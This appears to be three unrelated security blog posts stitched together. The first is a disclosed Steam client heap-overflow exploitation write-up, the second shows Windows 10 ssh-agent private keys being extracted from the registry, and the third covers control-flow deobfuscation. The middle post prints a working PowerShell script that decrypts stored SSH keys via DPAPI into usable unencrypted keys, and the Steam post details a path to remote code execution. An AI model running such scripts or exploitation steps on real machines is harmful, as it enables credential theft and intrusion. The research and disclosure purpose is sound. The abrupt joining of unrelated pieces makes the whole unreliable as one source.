Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Extracting SSH Private Keys from Windows 10 ssh-agent

Intro

This weekend I installed the Windows 10 Spring Update, and was pretty excited to start playing with the new, builtin OpenSSH tools.

Using OpenSSH natively in Windows is awesome since Windows admins no longer need to use Putty and PPK formatted keys. I started poking around and reading up more on what features were supported, and was pleasantly surprised to see ssh-agent.exe is included.

I found some references to using the new Windows ssh-agent in this MSDN article, and this part immediately grabbed my attention:

Securely store private keys

I’ve had some good fun in the past with hijacking SSH-agents, so I decided to start looking to see how Windows is «securely» storing your private keys with this new service.

I’ll outline in this post my methodology and steps to figuring it out. This was a fun investigative journey and I got better at working with PowerShell.

tl;dr

Private keys are protected with DPAPI and stored in the HKCU registry hive. I released some PoC code here to extract and reconstruct the RSA private key from the registry

Using OpenSSH in Windows 10

The first thing I tested was using the OpenSSH utilities normally to generate a few key-pairs and adding them to the ssh-agent.

First, I generated some password protected test key-pairs using ssh-keygen.exe:

Powershell ssh-keygen

Then I made sure the new ssh-agent service was running, and added the private key pairs to the running agent using ssh-add:

Powershell ssh-add

Running ssh-add.exe -L shows the keys currently managed by the SSH agent.

Finally, after adding the public keys to an Ubuntu box, I verified that I could SSH in from Windows 10 without needing the decrypt my private keys (since ssh-agent is taking care of that for me):

Powershell SSH to Ubuntu

Monitoring SSH Agent

To figure out how the SSH Agent was storing and reading my private keys, I poked around a little and started by statically examining ssh-agent.exe. My static analysis skills proved very weak, however, so I gave up and just decided to dynamically trace the process and see what it was doing.

I used procmon.exe from Sysinternals and added a filter for any process name containing «ssh».

With procmon capturing events, I then SSH’d into my Ubuntu machine again. Looking through all the events, I saw ssh.exe open a TCP connection to Ubuntu, and then finally saw ssh-agent.exe kick into action and read some values from the Registry:

SSH Procmon

Two things jumped out at me:

  • The process ssh-agent.exe reads values from HKCU\Software\OpenSSH\Agent\Keys
  • After reading those values, it immediately opens dpapi.dll

Just from this, I now knew that some sort of protected data was being stored in and read from the Registry, and ssh-agent was using Microsoft’s Data Protection API

Testing Registry Values

Sure enough, looking in the Registry, I could see two entries for the keys I added using ssh-add. The key names were the fingerprint of the public key, and a few binary blobs were present:

Registry SSH Entries

Registry SSH Values

After reading StackOverflow for an hour to remind myself of PowerShell’s ugly syntax (as is tradition), I was able to pull the registry values and manipulate them. The «comment» field was just ASCII encoded text and was the name of the key I added:

Powershell Reg Comment

The (default) value was just a byte array that didn’t decode to anything meaningful. I had a hunch this was the «encrypted» private key if I could just pull it and figure out how to decrypt it. I pulled the bytes to a Powershell variable:

Powershell keybytes

Unprotecting the Key

I wasn’t very familiar with DPAPI, although I knew a lot of post exploitation tools abused it to pull out secrets and credentials, so I knew other people had probably implemented a wrapper. A little Googling found me a simple oneliner by atifaziz that was way simpler than I imagined (okay, I guess I see why people like Powershell…. 😉 )

Add-Type AssemblyName System.Security;
[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String((type raw (Join-Path $env:USERPROFILE foobar))), $null, ‘CurrentUser’))

I still had no idea whether this would work or not, but I tried to unprotect the byte array using DPAPI. I was hoping maybe a perfectly formed OpenSSH private key would just come back, so I base64 encoded the result:

Add-Type -AssemblyName System.Security  
$unprotectedbytes = [Security.Cryptography.ProtectedData]::Unprotect($keybytes, $null, 'CurrentUser')

[System.Convert]::ToBase64String($unprotectedbytes)

The Base64 returned didn’t look like a private key, but I decoded it anyway just for fun and was very pleasantly surprised to see the string «ssh-rsa» in there! I had to be on the right track.

Base 64 decoded

Figuring out Binary Format

This part actually took me the longest. I knew I had some sort of binary representation of a key, but I could not figure out the format or how to use it.

I messed around generating various RSA keys with opensslputtygen and ssh-keygen, but never got anything close to resembling the binary I had.

Finally after much Googling, I found an awesome blogpost from NetSPI about pulling out OpenSSH private keys from memory dumps of ssh-agent on Linux: https://blog.netspi.com/stealing-unencrypted-ssh-agent-keys-from-memory/

Could it be that the binary format is the same? I pulled down the Python scriptlinked from the blog and fed it the unprotected base64 blob I got from the Windows registry:

parse_mem.py

It worked! I have no idea how the original author soleblaze figured out the correct format of the binary data, but I am so thankful he did and shared. All credit due to him for the awesome Python tool and blogpost.

Putting it all together

After I had proved to myself it was possible to extract a private key from the registry, I put it all together in two scripts.

GitHub Repo

The first is a Powershell script (extract_ssh_keys.ps1) which queries the Registry for any saved keys in ssh-agent. It then uses DPAPI with the current user context to unprotect the binary and save it in Base64. Since I didn’t even know how to start parsing Binary data in Powershell, I just saved all the keys to a JSON file that I could then import in Python. The Powershell script is only a few lines:

$path = "HKCU:\Software\OpenSSH\Agent\Keys\"

$regkeys = Get-ChildItem $path | Get-ItemProperty

if ($regkeys.Length -eq 0) {  
    Write-Host "No keys in registry"
    exit
}

$keys = @()

Add-Type -AssemblyName System.Security;

$regkeys | ForEach-Object {
    $key = @{}
    $comment = [System.Text.Encoding]::ASCII.GetString($_.comment)
    Write-Host "Pulling key: " $comment
    $encdata = $_.'(default)'
    $decdata = [Security.Cryptography.ProtectedData]::Unprotect($encdata, $null, 'CurrentUser')
    $b64key = [System.Convert]::ToBase64String($decdata)
    $key[$comment] = $b64key
    $keys += $key
}

ConvertTo-Json -InputObject $keys | Out-File -FilePath './extracted_keyblobs.json' -Encoding ascii  
Write-Host "extracted_keyblobs.json written. Use Python script to reconstruct private keys: python extractPrivateKeys.py extracted_keyblobs.json"  

I heavily borrowed the code from parse_mem_python.py by soleblaze and updated it to use Python3 for the next script: extractPrivateKeys.py. Feeding the JSON generated from the Powershell script will output all the RSA private keys found:

Extracting private keys

These RSA private keys are unencrypted. Even though when I created them I added a password, they are stored unencrypted with ssh-agent so I don’t need the password anymore.

To verify, I copied the key back to a Kali linux box and verified the fingerprint and used it to SSH in!

Using the key

Next Steps

Obviously my PowerShell-fu is weak and the code I’m releasing is more for PoC. It’s probably possible to re-create the private keys entirely in PowerShell. I’m also not taking credit for the Python code — that should all go to soleblaze for his original implementation.

CONTROL FLOW DEOBFUSCATION VIA ABSTRACT INTERPRETATION

I present some work that I did involving automatic deobfuscation of obfuscated control flow constructs with abstract interpretation.  Considering the image below, this project is responsible for taking graphs like the one on the left (where most of the «conditional» branches actually only go in one direction and are only present to thwart static analysis) and converting them into graphs like the one on the right.

Much work on deobfuscation relies on pattern-matching at least to some extent; I have coded such tools myself.  I have some distaste for such methods, since they stop working when the patterns change (they are «syntactic»).  I prefer to code my deobfuscation tools as generically («semantically») as possible, such that they capture innate properties of the obfuscation method in question, rather than hard-coding individual instances of the obfuscation.

The slides present a technique based on abstract interpretation, a form of static program analysis, for deobfuscating control flow transfers.  I translate the x86 code into a different («intermediate») language, and then perform an analysis based on three-valued logic over the translated code.  The end result is that certain classes of opaque predicates (conditional jumps that are either always taken or always not taken) are detected and resolved.  I have successfully used this technique to break several protections making use of similar obfuscation techniques.

Although I invented and implemented these techniques independently, given the wealth of work in program analysis, it wouldn’t surprise me to learn that the particular technique has been previously invented.  Proper references are appreciated.

Code is also included.  The source relies upon my Pandemic program analysis framework, which is not publicly available.  Hence, the code is for educational purposes only.  Nonetheless, I believe it is one of very few examples of publicly-available source code involving abstract interpretation on binaries.

PPTX presentationOCaml source code (for educational purposes only — does not include my framework.)